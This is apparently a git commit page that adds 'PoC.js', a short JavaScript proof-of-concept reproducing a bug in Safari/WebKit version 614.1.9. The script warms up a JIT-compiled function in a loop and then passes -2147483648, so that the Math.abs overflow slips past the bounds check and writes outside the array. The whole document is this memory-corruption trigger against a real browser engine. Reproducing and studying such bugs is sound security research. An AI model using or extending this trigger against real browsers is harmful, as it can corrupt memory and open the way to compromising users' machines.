PoC Reproduction in version Safari-614.1.9
This commit is contained in:
15
Safari-614.1.9/PoC/PoC.js
Normal file
15
Safari-614.1.9/PoC/PoC.js
Normal file
@@ -0,0 +1,15 @@
|
||||
function f(arr, n) {
|
||||
n &= 0xffffffff;
|
||||
if (n < -1) {
|
||||
let v = (-n)&0xffffffff;
|
||||
let i = Math.abs(n);
|
||||
if (i < arr.length) {
|
||||
return arr[i] = 1000;
|
||||
}
|
||||
}
|
||||
}
|
||||
let arr= new Array(10);
|
||||
for (let i = 0; i < 50000; i++) {
|
||||
f(arr, -3);
|
||||
}
|
||||
f(arr, -2147483648);
|
||||
Reference in New Issue
Block a user